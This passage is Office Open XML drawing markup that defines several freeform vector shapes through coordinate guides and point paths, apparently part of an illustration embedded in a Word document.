                                      <a:pt x="21" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="5"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="18"/>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s:wsp>
                            <wps:cNvPr id="670" name="Freeform 324"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8145" y="3473"/>
                                <a:ext cx="26" cy="17"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 26 w 26"/>
                                  <a:gd name="T1" fmla="*/ 8 h 17"/>
                                  <a:gd name="T2" fmla="*/ 26 w 26"/>
                                  <a:gd name="T3" fmla="*/ 17 h 17"/>
                                  <a:gd name="T4" fmla="*/ 21 w 26"/>
                                  <a:gd name="T5" fmla="*/ 17 h 17"/>
                                  <a:gd name="T6" fmla="*/ 0 w 26"/>
                                  <a:gd name="T7" fmla="*/ 17 h 17"/>
                                  <a:gd name="T8" fmla="*/ 0 w 26"/>
                                  <a:gd name="T9" fmla="*/ 8 h 17"/>
                                  <a:gd name="T10" fmla="*/ 5 w 26"/>
                                  <a:gd name="T11" fmla="*/ 0 h 17"/>
                                  <a:gd name="T12" fmla="*/ 15 w 26"/>
                                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                                  <a:gd name="T14" fmla="*/ 26 w 26"/>
                                  <a:gd name="T15" fmla="*/ 8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7">
                                    <a:moveTo>
                                      <a:pt x="26" y="8"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26"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325"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7587" y="3490"/>
                                <a:ext cx="465" cy="957"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 465 w 465"/>
                                  <a:gd name="T1" fmla="*/ 13 h 957"/>
                                  <a:gd name="T2" fmla="*/ 423 w 465"/>
                                  <a:gd name="T3" fmla="*/ 26 h 957"/>
                                  <a:gd name="T4" fmla="*/ 382 w 465"/>
                                  <a:gd name="T5" fmla="*/ 39 h 957"/>
                                  <a:gd name="T6" fmla="*/ 341 w 465"/>
                                  <a:gd name="T7" fmla="*/ 61 h 957"/>
                                  <a:gd name="T8" fmla="*/ 305 w 465"/>
                                  <a:gd name="T9" fmla="*/ 82 h 957"/>
                                  <a:gd name="T10" fmla="*/ 268 w 465"/>
                                  <a:gd name="T11" fmla="*/ 108 h 957"/>
                                  <a:gd name="T12" fmla="*/ 243 w 465"/>
                                  <a:gd name="T13" fmla="*/ 139 h 957"/>
                                  <a:gd name="T14" fmla="*/ 217 w 465"/>
                                  <a:gd name="T15" fmla="*/ 169 h 957"/>
                                  <a:gd name="T16" fmla="*/ 191 w 465"/>
                                  <a:gd name="T17" fmla="*/ 204 h 957"/>
                                  <a:gd name="T18" fmla="*/ 175 w 465"/>
                                  <a:gd name="T19" fmla="*/ 238 h 957"/>
                                  <a:gd name="T20" fmla="*/ 160 w 465"/>
                                  <a:gd name="T21" fmla="*/ 299 h 957"/>
                                  <a:gd name="T22" fmla="*/ 149 w 465"/>
                                  <a:gd name="T23" fmla="*/ 364 h 957"/>
                                  <a:gd name="T24" fmla="*/ 149 w 465"/>
                                  <a:gd name="T25" fmla="*/ 485 h 957"/>
                                  <a:gd name="T26" fmla="*/ 15 w 465"/>
                                  <a:gd name="T27" fmla="*/ 489 h 957"/>
                                  <a:gd name="T28" fmla="*/ 10 w 465"/>
                                  <a:gd name="T29" fmla="*/ 494 h 957"/>
                                  <a:gd name="T30" fmla="*/ 10 w 465"/>
                                  <a:gd name="T31" fmla="*/ 914 h 957"/>
                                  <a:gd name="T32" fmla="*/ 10 w 465"/>
                                  <a:gd name="T33" fmla="*/ 957 h 957"/>
                                  <a:gd name="T34" fmla="*/ 0 w 465"/>
                                  <a:gd name="T35" fmla="*/ 953 h 957"/>
                                  <a:gd name="T36" fmla="*/ 0 w 465"/>
                                  <a:gd name="T37" fmla="*/ 870 h 957"/>
                                  <a:gd name="T38" fmla="*/ 0 w 465"/>
                                  <a:gd name="T39" fmla="*/ 476 h 957"/>
                                  <a:gd name="T40" fmla="*/ 62 w 465"/>
                                  <a:gd name="T41" fmla="*/ 472 h 957"/>
                                  <a:gd name="T42" fmla="*/ 129 w 465"/>
                                  <a:gd name="T43" fmla="*/ 472 h 957"/>
                                  <a:gd name="T44" fmla="*/ 129 w 465"/>
                                  <a:gd name="T45" fmla="*/ 463 h 957"/>
                                  <a:gd name="T46" fmla="*/ 129 w 465"/>
                                  <a:gd name="T47" fmla="*/ 377 h 957"/>
                                  <a:gd name="T48" fmla="*/ 139 w 465"/>
                                  <a:gd name="T49" fmla="*/ 303 h 957"/>
                                  <a:gd name="T50" fmla="*/ 149 w 465"/>
                                  <a:gd name="T51" fmla="*/ 264 h 957"/>
                                  <a:gd name="T52" fmla="*/ 160 w 465"/>
                                  <a:gd name="T53" fmla="*/ 225 h 957"/>
                                  <a:gd name="T54" fmla="*/ 181 w 465"/>
                                  <a:gd name="T55" fmla="*/ 191 h 957"/>
                                  <a:gd name="T56" fmla="*/ 206 w 465"/>
                                  <a:gd name="T57" fmla="*/ 152 h 957"/>
                                  <a:gd name="T58" fmla="*/ 258 w 465"/>
                                  <a:gd name="T59" fmla="*/ 100 h 957"/>
                                  <a:gd name="T60" fmla="*/ 315 w 465"/>
                                  <a:gd name="T61" fmla="*/ 56 h 957"/>
                                  <a:gd name="T62" fmla="*/ 351 w 465"/>
                                  <a:gd name="T63" fmla="*/ 39 h 957"/>
                                  <a:gd name="T64" fmla="*/ 387 w 465"/>
                                  <a:gd name="T65" fmla="*/ 22 h 957"/>
                                  <a:gd name="T66" fmla="*/ 423 w 465"/>
                                  <a:gd name="T67" fmla="*/ 9 h 957"/>
                                  <a:gd name="T68" fmla="*/ 460 w 465"/>
                                  <a:gd name="T69" fmla="*/ 0 h 957"/>
                                  <a:gd name="T70" fmla="*/ 465 w 465"/>
                                  <a:gd name="T71" fmla="*/ 13 h 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5" h="957">
                                    <a:moveTo>
                                      <a:pt x="465" y="13"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="423" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="382" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="341" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="305" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="268" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="243" y="139"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="217" y="169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="191" y="204"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="175" y="238"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="299"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="149" y="364"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="149" y="485"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="489"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="494"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="914"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="957"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="953"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="870"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="476"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="472"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="472"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="463"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="377"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="303"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="149" y="264"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="225"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="181" y="191"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="206" y="152"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="258" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="315" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="351" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="387" y="22"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="423" y="9"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="460" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="465" y="13"/>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326"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7618" y="3503"/>
                                <a:ext cx="584" cy="996"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 584 w 584"/>
                                  <a:gd name="T1" fmla="*/ 30 h 996"/>
                                  <a:gd name="T2" fmla="*/ 584 w 584"/>
                                  <a:gd name="T3" fmla="*/ 30 h 996"/>
                                  <a:gd name="T4" fmla="*/ 527 w 584"/>
                                  <a:gd name="T5" fmla="*/ 39 h 996"/>
                                  <a:gd name="T6" fmla="*/ 475 w 584"/>
                                  <a:gd name="T7" fmla="*/ 48 h 996"/>
                                  <a:gd name="T8" fmla="*/ 418 w 584"/>
                                  <a:gd name="T9" fmla="*/ 61 h 996"/>
                                  <a:gd name="T10" fmla="*/ 372 w 584"/>
                                  <a:gd name="T11" fmla="*/ 78 h 996"/>
                                  <a:gd name="T12" fmla="*/ 325 w 584"/>
                                  <a:gd name="T13" fmla="*/ 104 h 996"/>
                                  <a:gd name="T14" fmla="*/ 284 w 584"/>
                                  <a:gd name="T15" fmla="*/ 130 h 996"/>
                                  <a:gd name="T16" fmla="*/ 248 w 584"/>
                                  <a:gd name="T17" fmla="*/ 169 h 996"/>
                                  <a:gd name="T18" fmla="*/ 222 w 584"/>
                                  <a:gd name="T19" fmla="*/ 212 h 996"/>
                                  <a:gd name="T20" fmla="*/ 201 w 584"/>
                                  <a:gd name="T21" fmla="*/ 243 h 996"/>
                                  <a:gd name="T22" fmla="*/ 191 w 584"/>
                                  <a:gd name="T23" fmla="*/ 282 h 996"/>
                                  <a:gd name="T24" fmla="*/ 186 w 584"/>
                                  <a:gd name="T25" fmla="*/ 359 h 996"/>
                                  <a:gd name="T26" fmla="*/ 181 w 584"/>
                                  <a:gd name="T27" fmla="*/ 515 h 996"/>
                                  <a:gd name="T28" fmla="*/ 41 w 584"/>
                                  <a:gd name="T29" fmla="*/ 520 h 996"/>
                                  <a:gd name="T30" fmla="*/ 36 w 584"/>
                                  <a:gd name="T31" fmla="*/ 524 h 996"/>
                                  <a:gd name="T32" fmla="*/ 36 w 584"/>
                                  <a:gd name="T33" fmla="*/ 762 h 996"/>
                                  <a:gd name="T34" fmla="*/ 31 w 584"/>
                                  <a:gd name="T35" fmla="*/ 987 h 996"/>
                                  <a:gd name="T36" fmla="*/ 25 w 584"/>
                                  <a:gd name="T37" fmla="*/ 996 h 996"/>
                                  <a:gd name="T38" fmla="*/ 20 w 584"/>
                                  <a:gd name="T39" fmla="*/ 996 h 996"/>
                                  <a:gd name="T40" fmla="*/ 15 w 584"/>
                                  <a:gd name="T41" fmla="*/ 996 h 996"/>
                                  <a:gd name="T42" fmla="*/ 5 w 584"/>
                                  <a:gd name="T43" fmla="*/ 983 h 996"/>
                                  <a:gd name="T44" fmla="*/ 5 w 584"/>
                                  <a:gd name="T45" fmla="*/ 966 h 996"/>
                                  <a:gd name="T46" fmla="*/ 0 w 584"/>
                                  <a:gd name="T47" fmla="*/ 935 h 996"/>
                                  <a:gd name="T48" fmla="*/ 0 w 584"/>
                                  <a:gd name="T49" fmla="*/ 494 h 996"/>
                                  <a:gd name="T50" fmla="*/ 5 w 584"/>
                                  <a:gd name="T51" fmla="*/ 489 h 996"/>
                                  <a:gd name="T52" fmla="*/ 134 w 584"/>
                                  <a:gd name="T53" fmla="*/ 485 h 996"/>
                                  <a:gd name="T54" fmla="*/ 139 w 584"/>
                                  <a:gd name="T55" fmla="*/ 481 h 996"/>
                                  <a:gd name="T56" fmla="*/ 139 w 584"/>
                                  <a:gd name="T57" fmla="*/ 420 h 996"/>
                                  <a:gd name="T58" fmla="*/ 139 w 584"/>
                                  <a:gd name="T59" fmla="*/ 359 h 996"/>
                                  <a:gd name="T60" fmla="*/ 144 w 584"/>
                                  <a:gd name="T61" fmla="*/ 303 h 996"/>
                                  <a:gd name="T62" fmla="*/ 160 w 584"/>
                                  <a:gd name="T63" fmla="*/ 247 h 996"/>
                                  <a:gd name="T64" fmla="*/ 186 w 584"/>
                                  <a:gd name="T65" fmla="*/ 195 h 996"/>
                                  <a:gd name="T66" fmla="*/ 217 w 584"/>
                                  <a:gd name="T67" fmla="*/ 143 h 996"/>
                                  <a:gd name="T68" fmla="*/ 263 w 584"/>
                                  <a:gd name="T69" fmla="*/ 100 h 996"/>
                                  <a:gd name="T70" fmla="*/ 289 w 584"/>
                                  <a:gd name="T71" fmla="*/ 78 h 996"/>
                                  <a:gd name="T72" fmla="*/ 320 w 584"/>
                                  <a:gd name="T73" fmla="*/ 61 h 996"/>
                                  <a:gd name="T74" fmla="*/ 351 w 584"/>
                                  <a:gd name="T75" fmla="*/ 48 h 996"/>
                                  <a:gd name="T76" fmla="*/ 387 w 584"/>
                                  <a:gd name="T77" fmla="*/ 35 h 996"/>
                                  <a:gd name="T78" fmla="*/ 449 w 584"/>
                                  <a:gd name="T79" fmla="*/ 17 h 996"/>
                                  <a:gd name="T80" fmla="*/ 568 w 584"/>
                                  <a:gd name="T81" fmla="*/ 0 h 996"/>
                                  <a:gd name="T82" fmla="*/ 584 w 584"/>
                                  <a:gd name="T83" fmla="*/ 30 h 9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84" h="996">
                                    <a:moveTo>
                                      <a:pt x="584" y="30"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="584" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="527" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="475" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="418" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="372" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="325" y="104"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="284" y="130"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="248" y="169"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="222" y="212"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="201" y="243"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="191" y="282"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="186" y="359"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="181" y="515"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="520"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="524"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="762"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="31" y="987"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="25" y="996"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="20" y="996"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="996"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="983"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="966"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="935"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="494"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="489"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="485"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="481"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="420"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="359"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="144" y="303"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="160" y="247"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="186" y="195"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="217" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="263" y="100"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="289" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="320" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="351" y="48"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="387" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="449" y="17"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="568" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="584" y="3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327"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8284" y="3512"/>
                                <a:ext cx="37" cy="30"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 37 w 37"/>
                                  <a:gd name="T1" fmla="*/ 17 h 30"/>
                                  <a:gd name="T2" fmla="*/ 37 w 37"/>
                                  <a:gd name="T3" fmla="*/ 30 h 30"/>
                                  <a:gd name="T4" fmla="*/ 26 w 37"/>
                                  <a:gd name="T5" fmla="*/ 30 h 30"/>
                                  <a:gd name="T6" fmla="*/ 21 w 37"/>
                                  <a:gd name="T7" fmla="*/ 30 h 30"/>
                                  <a:gd name="T8" fmla="*/ 16 w 37"/>
                                  <a:gd name="T9" fmla="*/ 30 h 30"/>
                                  <a:gd name="T10" fmla="*/ 0 w 37"/>
                                  <a:gd name="T11" fmla="*/ 0 h 30"/>
                                  <a:gd name="T12" fmla="*/ 16 w 37"/>
                                  <a:gd name="T13" fmla="*/ 8 h 30"/>
                                  <a:gd name="T14" fmla="*/ 37 w 37"/>
                                  <a:gd name="T15" fmla="*/ 17 h 3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30">
                                    <a:moveTo>
                                      <a:pt x="37" y="17"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="37" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="16" y="8"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="37"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328"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="8300" y="3529"/>
                                <a:ext cx="176" cy="152"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
                                <a:gdLst>
                                  <a:gd name="T0" fmla="*/ 176 w 176"/>
                                  <a:gd name="T1" fmla="*/ 22 h 152"/>
                                  <a:gd name="T2" fmla="*/ 145 w 176"/>
                                  <a:gd name="T3" fmla="*/ 35 h 152"/>
                                  <a:gd name="T4" fmla="*/ 129 w 176"/>
                                  <a:gd name="T5" fmla="*/ 35 h 152"/>
                                  <a:gd name="T6" fmla="*/ 108 w 176"/>
                                  <a:gd name="T7" fmla="*/ 35 h 152"/>
                                  <a:gd name="T8" fmla="*/ 93 w 176"/>
                                  <a:gd name="T9" fmla="*/ 26 h 152"/>
                                  <a:gd name="T10" fmla="*/ 83 w 176"/>
                                  <a:gd name="T11" fmla="*/ 26 h 152"/>
                                  <a:gd name="T12" fmla="*/ 72 w 176"/>
                                  <a:gd name="T13" fmla="*/ 30 h 152"/>
                                  <a:gd name="T14" fmla="*/ 72 w 176"/>
                                  <a:gd name="T15" fmla="*/ 35 h 152"/>
                                  <a:gd name="T16" fmla="*/ 72 w 176"/>
                                  <a:gd name="T17" fmla="*/ 39 h 152"/>
                                  <a:gd name="T18" fmla="*/ 108 w 176"/>
                                  <a:gd name="T19" fmla="*/ 52 h 152"/>
                                  <a:gd name="T20" fmla="*/ 124 w 176"/>
                                  <a:gd name="T21" fmla="*/ 65 h 152"/>
                                  <a:gd name="T22" fmla="*/ 134 w 176"/>
                                  <a:gd name="T23" fmla="*/ 78 h 152"/>
                                  <a:gd name="T24" fmla="*/ 145 w 176"/>
                                  <a:gd name="T25" fmla="*/ 121 h 152"/>
                                  <a:gd name="T26" fmla="*/ 129 w 176"/>
                                  <a:gd name="T27" fmla="*/ 117 h 152"/>
                                  <a:gd name="T28" fmla="*/ 103 w 176"/>
                                  <a:gd name="T29" fmla="*/ 117 h 152"/>
                                  <a:gd name="T30" fmla="*/ 88 w 176"/>
                                  <a:gd name="T31" fmla="*/ 108 h 152"/>
                                  <a:gd name="T32" fmla="*/ 72 w 176"/>
                                  <a:gd name="T33" fmla="*/ 95 h 152"/>
                                  <a:gd name="T34" fmla="*/ 62 w 176"/>
                                  <a:gd name="T35" fmla="*/ 87 h 152"/>
                                  <a:gd name="T36" fmla="*/ 57 w 176"/>
                                  <a:gd name="T37" fmla="*/ 74 h 152"/>
                                  <a:gd name="T38" fmla="*/ 52 w 176"/>
                                  <a:gd name="T39" fmla="*/ 65 h 152"/>
                                  <a:gd name="T40" fmla="*/ 36 w 176"/>
                                  <a:gd name="T41" fmla="*/ 56 h 152"/>
                                  <a:gd name="T42" fmla="*/ 36 w 176"/>
                                  <a:gd name="T43" fmla="*/ 61 h 152"/>
                                  <a:gd name="T44" fmla="*/ 41 w 176"/>
                                  <a:gd name="T45" fmla="*/ 82 h 152"/>
                                  <a:gd name="T46" fmla="*/ 46 w 176"/>
                                  <a:gd name="T47" fmla="*/ 113 h 152"/>
                                  <a:gd name="T48" fmla="*/ 36 w 176"/>
                                  <a:gd name="T49" fmla="*/ 134 h 152"/>
                                  <a:gd name="T50" fmla="*/ 21 w 176"/>
                                  <a:gd name="T51" fmla="*/ 152 h 152"/>
                                  <a:gd name="T52" fmla="*/ 10 w 176"/>
                                  <a:gd name="T53" fmla="*/ 143 h 152"/>
                                  <a:gd name="T54" fmla="*/ 5 w 176"/>
                                  <a:gd name="T55" fmla="*/ 134 h 152"/>
                                  <a:gd name="T56" fmla="*/ 0 w 176"/>
                                  <a:gd name="T57" fmla="*/ 108 h 152"/>
                                  <a:gd name="T58" fmla="*/ 10 w 176"/>
                                  <a:gd name="T59" fmla="*/ 56 h 152"/>
                                  <a:gd name="T60" fmla="*/ 10 w 176"/>
                                  <a:gd name="T61" fmla="*/ 39 h 152"/>
                                  <a:gd name="T62" fmla="*/ 15 w 176"/>
                                  <a:gd name="T63" fmla="*/ 35 h 152"/>
                                  <a:gd name="T64" fmla="*/ 26 w 176"/>
                                  <a:gd name="T65" fmla="*/ 30 h 152"/>
                                  <a:gd name="T66" fmla="*/ 36 w 176"/>
                                  <a:gd name="T67" fmla="*/ 30 h 152"/>
                                  <a:gd name="T68" fmla="*/ 46 w 176"/>
                                  <a:gd name="T69" fmla="*/ 26 h 152"/>
                                  <a:gd name="T70" fmla="*/ 41 w 176"/>
                                  <a:gd name="T71" fmla="*/ 13 h 152"/>
                                  <a:gd name="T72" fmla="*/ 46 w 176"/>
                                  <a:gd name="T73" fmla="*/ 4 h 152"/>
                                  <a:gd name="T74" fmla="*/ 93 w 176"/>
                                  <a:gd name="T75" fmla="*/ 0 h 152"/>
                                  <a:gd name="T76" fmla="*/ 114 w 176"/>
                                  <a:gd name="T77" fmla="*/ 0 h 152"/>
                                  <a:gd name="T78" fmla="*/ 139 w 176"/>
                                  <a:gd name="T79" fmla="*/ 0 h 152"/>
                                  <a:gd name="T80" fmla="*/ 176 w 176"/>
                                  <a:gd name="T81" fmla="*/ 2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6" h="152">
                                    <a:moveTo>
                                      <a:pt x="176" y="22"/>
                                    </a:moveTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="83" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="108" y="52"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="124" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="134" y="78"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="145" y="121"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="129" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="103" y="117"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="88" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="72" y="95"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="62" y="87"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="57" y="74"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="52" y="65"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="61"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="82"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="113"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="21" y="152"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="143"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="5" y="134"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="0" y="108"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="56"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="10" y="39"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="15" y="35"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="26" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="36" y="30"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="26"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="41" y="13"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="46" y="4"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="93" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="114" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="139" y="0"/>
                                    </a:lnTo>
                                    <a:lnTo>
                                      <a:pt x="176" y="22"/>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329"/>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr bwMode="auto">
                              <a:xfrm>
                                <a:off x="7674" y="3564"/>
                                <a:ext cx="83" cy="60"/>
                              </a:xfrm>
                              <a:custGeom>
                                <a:avLst/>
